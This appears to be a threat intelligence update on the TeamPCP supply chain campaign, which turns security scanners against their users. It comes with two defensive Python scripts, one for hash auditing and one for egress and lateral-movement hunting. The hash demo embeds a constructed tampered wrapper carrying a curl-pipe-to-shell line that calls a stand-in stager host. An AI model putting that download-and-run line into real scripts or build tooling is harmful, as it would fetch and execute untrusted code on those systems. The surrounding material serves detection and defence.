Key Takeaway
TeamPCP, a threat actor group weaponizing security scanning tooling in supply chain attacks, has expanded its campaign through April 1, 2026, with confirmed victims including Databricks and AstraZeneca across dual ransomware and data exfiltration operations. This fifth intelligence update extends coverage from Update 004 and consolidates two days of new developments. Affected organizations should audit CI/CD and scanner tooling, hunt for lateral movement from build infrastructure, and verify backup isolation immediately.
TeamPCP Supply Chain Campaign — Update 005 (Through April 1, 2026)
Disclosure Date: April 1, 2026 | Campaign Designation: TeamPCP | Report Version: v3.0 Update 005
Breach Overview
The threat actor group tracked as TeamPCP continues to execute an active supply chain campaign first documented in the intelligence report "When the Security Scanner Became the Weapon" (v3.0, March 25, 2026). This fifth update consolidates two days of operational intelligence spanning March 31 through April 1, 2026, extending coverage from Update 004, which closed on March 30 and covered the Databricks investigation, dual ransomware operations, and an AstraZeneca data release.
The campaign name reflects TeamPCP's core tradecraft: weaponizing security scanning tooling to gain footholds within target environments. Rather than exploiting perimeter vulnerabilities through conventional means, the group embedded malicious functionality into tools that defenders and developers actively trust and invoke within CI/CD pipelines and security workflows.
What Is Known About the Attack Vector
Based on prior updates to this report series, TeamPCP's intrusion chain begins at the software supply chain layer. The group has leveraged compromised or malicious packages, scanner plugins, or build dependencies that execute attacker-controlled code during routine security or build operations. This approach grants execution context with elevated trust, often running inside hardened environments that would otherwise block external payloads.
Update 004 documented parallel ransomware operations running alongside data exfiltration, indicating TeamPCP operates with a dual-track monetization model: encrypting infrastructure for ransom while simultaneously staging exfiltrated data for public release or sale. The AstraZeneca data release documented in Update 004 confirms that at least one major enterprise target sustained confirmed data exfiltration resulting in public exposure.
Affected Organizations and Exposed Data
Confirmed targets across the campaign span enterprise technology and life sciences sectors. Databricks was named in Update 004 as an organization under active investigation in connection with this campaign. AstraZeneca sustained a data release, though the precise scope of records exposed — including whether patient data, intellectual property, or internal credentials were included — has not been fully quantified in public disclosures as of April 1, 2026.
The supply chain intrusion vector means the total affected population extends beyond directly breached organizations. Any enterprise consuming compromised packages or tooling from affected upstream vendors or repositories carries potential secondary exposure. Security teams should not treat this as a point-in-time, single-victim incident.
Full victim counts and data classification details for the March 31–April 1 period covered by this update have not been released in public intelligence at the time of this writing. This report will be updated as further specifics are disclosed.
Ransomware Operations
TeamPCP ran dual ransomware operations documented through the Update 004 period. The use of dual ransomware — deploying two distinct ransomware families against the same target, either sequentially or simultaneously — complicates recovery operations. Defenders restoring from backup after neutralizing one encryption event may face a second active payload, or may find that backup infrastructure was itself targeted during the dwell period.
No specific ransomware family names or CVE identifiers have been attributed to TeamPCP's payload deployment in the publicly available report extracts reviewed for this article. Attribution to specific tooling will be updated as threat intelligence sources publish additional indicators.
Recommended Actions for SOC and Security Engineering Teams
Audit your build and scan tooling immediately. Any security scanner, SAST tool, dependency checker, or CI/CD plugin introduced into or updated within pipelines over the past 90 days warrants integrity verification. Compare the versions and hashes of installed artifacts against the vendor's signed release manifests, and treat anything present on a build agent that no manifest accounts for as unpinned until someone explains it. Look for unexpected network egress from build agents or scanner processes.
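The manifest comparison above, worked through as an added example (not code from the report or from any scanner vendor): a script that walks a tooling directory, hashes every file, and sorts each one into matched, modified, unpinned, or missing relative to a pinned SHA-256 manifest. It assumes the manifest was already extracted from the vendor's signed release metadata and that the signature was checked separately with the vendor's published key; the file names, contents, and tool directory below are constructed for the demonstration.

```python
"""Audit a CI tooling directory against a pinned SHA-256 manifest.

Added example for this update, not code from the report or from any
vendor. Assumes the manifest was extracted from the vendor's signed
release metadata and that its signature was already checked with the
vendor's published key; this script only verifies the pinned hashes.
"""
import hashlib
import os
import tempfile


def sha256_file(path, chunk_size=1 << 16):
    """Stream a file through SHA-256 so large scanner binaries are fine."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk_size), b""):
            digest.update(block)
    return digest.hexdigest()


def audit_tooling(tool_dir, manifest):
    """Classify every file under tool_dir relative to the manifest.

    Returns a dict with four sorted lists:
      ok        - present and hash matches the pin
      modified  - present but hash differs (tampered or unexpected version)
      unpinned  - present but not in the manifest (a plugin nobody signed off on)
      missing   - pinned but absent (tool silently removed or renamed)
    """
    report = {"ok": [], "modified": [], "unpinned": [], "missing": []}
    seen = set()
    for root, _dirs, files in os.walk(tool_dir):
        for name in files:
            full = os.path.join(root, name)
            rel = os.path.relpath(full, tool_dir).replace(os.sep, "/")
            seen.add(rel)
            expected = manifest.get(rel)
            if expected is None:
                report["unpinned"].append(rel)
            elif sha256_file(full) == expected:
                report["ok"].append(rel)
            else:
                report["modified"].append(rel)
    report["missing"] = [rel for rel in manifest if rel not in seen]
    for bucket in report.values():
        bucket.sort()
    return report


def demo():
    """Build a throwaway tool tree with constructed contents and audit it.

    File names and contents are made up for the example; they are not
    indicators from the TeamPCP reporting.
    """
    pristine = b"#!/bin/sh\nexec /opt/scanner/bin/scan \"$@\"\n"
    # Constructed tamper: the same wrapper with an extra download-and-run line.
    tampered = (b"#!/bin/sh\ncurl -fsSL http://stager.example.invalid/s | sh\n"
                b"exec /opt/scanner/bin/scan \"$@\"\n")
    manifest = {
        "bin/scanner": hashlib.sha256(pristine).hexdigest(),
        "bin/depcheck": hashlib.sha256(pristine).hexdigest(),
        "bin/sast": hashlib.sha256(pristine).hexdigest(),
    }
    with tempfile.TemporaryDirectory() as tool_dir:
        os.makedirs(os.path.join(tool_dir, "bin"))
        os.makedirs(os.path.join(tool_dir, "plugins"))
        with open(os.path.join(tool_dir, "bin", "scanner"), "wb") as fh:
            fh.write(pristine)
        with open(os.path.join(tool_dir, "bin", "depcheck"), "wb") as fh:
            fh.write(tampered)  # pinned, but contents changed
        with open(os.path.join(tool_dir, "plugins", "extra.so"), "wb") as fh:
            fh.write(b"\x7fELF-constructed")  # nobody pinned this one
        # bin/sast is pinned but never written, so it shows up as missing
        return audit_tooling(tool_dir, manifest)


if __name__ == "__main__":
    for bucket, entries in demo().items():
        print(f"{bucket:9s} {entries}")
```

Run against the real tool directory on a build agent by replacing the constructed tree in demo() with the agent's install path and a manifest generated from the vendor's release metadata. Everything in the modified or unpinned buckets is a candidate for removal and incident review, not a version drift to tidy up later.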
Hunt for lateral movement from build infrastructure. TeamPCP's entry via scanner tooling means initial access likely materialized inside a build agent, developer workstation, or security tooling server — not at the network perimeter. Review lateral movement from these asset classes in your SIEM and EDR telemetry.
Validate backup integrity and isolation. Given dual ransomware deployment, confirm that backup systems are not reachable from compromised build or scanner infrastructure. Test restoration procedures now, before an encryption event forces the issue.
Monitor threat intelligence feeds for Databricks- and AstraZeneca-adjacent indicators. If your organization uses Databricks as a data platform or has supply chain relationships with AstraZeneca or its contractors, treat any shared credentials, API tokens, or pipeline integrations as potentially compromised pending further investigation.
Apply zero-trust principles to scanner and tooling processes. Restrict outbound network access from security tooling to an explicit allowlist of update and reporting endpoints. Scanner processes should not require broad internet egress, nor should a build agent initiate remote-administration connections to other internal hosts. Block unexpected outbound connections from these processes at the host firewall level and alert on the blocked attempts.
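A hunt that covers three of the recommendations above in one pass (unexpected egress from scanner processes, lateral movement from build infrastructure, and the allowlist a zero-trust egress policy implies), written as an added example rather than code from the report. The JSON event shape, hostnames, allowlist entries, and IP ranges are assumptions for illustration, and the sample telemetry is constructed; map the field names onto your own EDR or host-firewall export before running it against real data.

```python
"""Hunt build-agent telemetry for unexpected egress and lateral movement.

Added example, not from the report. The event format, hostnames,
allowlist and IP ranges below are assumptions for illustration; map
them onto your own EDR or host-firewall export before use.
"""
import ipaddress
import json

# Assumed inventory: hosts that run scanner/build jobs.
BUILD_AGENTS = {"ci-runner-01", "ci-runner-02"}

# Assumed egress allowlist: (destination name, port) pairs a scanner
# legitimately needs, e.g. the vendor's signature/feed update endpoint.
EGRESS_ALLOW = {("updates.vendor.example", 443)}

# Assumed internal exception: the git server's SSH endpoint.
INTERNAL_ALLOW = {("10.0.1.5", 22)}

# Remote-admin ports a build agent should never initiate toward other hosts.
ADMIN_PORTS = {22, 135, 445, 3389, 5985, 5986}

INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_internal(ip_text):
    ip = ipaddress.ip_address(ip_text)
    return any(ip in net for net in INTERNAL_NETS)


def hunt(event_lines):
    """Return a list of findings, one per suspicious connection event."""
    findings = []
    for raw in event_lines:
        ev = json.loads(raw)
        if ev["host"] not in BUILD_AGENTS:
            continue
        dst_ip, dport = ev["dst_ip"], int(ev["dport"])
        if is_internal(dst_ip):
            # Build agents talking SMB/RDP/WinRM/SSH to other internal hosts
            # is the lateral-movement pattern to review first.
            if dport in ADMIN_PORTS and (dst_ip, dport) not in INTERNAL_ALLOW:
                findings.append({"rule": "lateral_movement_candidate", **ev})
        elif (ev.get("dst_name"), dport) not in EGRESS_ALLOW:
            # Anything external that is not on the allowlist is unexpected egress.
            findings.append({"rule": "unexpected_egress", **ev})
    return findings


def summarize(findings):
    """Aggregate bytes out per (host, process, destination), largest first."""
    totals = {}
    for f in findings:
        key = (f["host"], f["proc"], f["dst_ip"])
        totals[key] = totals.get(key, 0) + int(f.get("bytes_out", 0))
    return sorted(totals.items(), key=lambda kv: kv[1], reverse=True)


# Constructed sample events (not real telemetry); one JSON object per line.
SAMPLE_EVENTS = [
    '{"ts":"2026-03-31T02:14:05Z","host":"ci-runner-01","proc":"scanner","dst_ip":"203.0.113.10","dst_name":"updates.vendor.example","dport":443,"bytes_out":2048}',
    '{"ts":"2026-03-31T02:14:09Z","host":"ci-runner-01","proc":"scanner","dst_ip":"198.51.100.23","dst_name":null,"dport":443,"bytes_out":5242880}',
    '{"ts":"2026-03-31T02:15:00Z","host":"ci-runner-02","proc":"scanner","dst_ip":"10.0.1.5","dst_name":"git.internal","dport":22,"bytes_out":900}',
    '{"ts":"2026-03-31T02:15:31Z","host":"ci-runner-02","proc":"scanner","dst_ip":"10.0.20.7","dst_name":null,"dport":445,"bytes_out":120}',
    '{"ts":"2026-03-31T02:16:12Z","host":"ci-runner-01","proc":"scanner","dst_ip":"10.0.9.40","dst_name":null,"dport":5985,"bytes_out":310}',
    '{"ts":"2026-03-31T02:16:40Z","host":"dev-laptop-07","proc":"browser","dst_ip":"198.51.100.23","dst_name":null,"dport":443,"bytes_out":100}',
]

if __name__ == "__main__":
    hits = hunt(SAMPLE_EVENTS)
    for h in hits:
        print(h["rule"], h["host"], h["proc"], f'{h["dst_ip"]}:{h["dport"]}')
    for (host, proc, dst), nbytes in summarize(hits):
        print(f"{host} {proc} -> {dst}: {nbytes} bytes out")
```

The same allowlist drives both the hunt and the host-firewall policy: once the (destination, port) pairs in EGRESS_ALLOW and INTERNAL_ALLOW are confirmed to be everything a scanner job needs, the firewall rule is "allow those, deny and log the rest", and every logged deny becomes a finding of the kind this script surfaces. The byte-count summary is there to rank external destinations, since a scanner that pushes megabytes to an unlisted host is a stronger exfiltration lead than one that made a single short connection.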
Organizations seeking the full indicator set and technical annexes should reference the complete TeamPCP intelligence report series, with the base report dated March 25, 2026, and prior updates through April 1, 2026.
Original Source
SANS ISC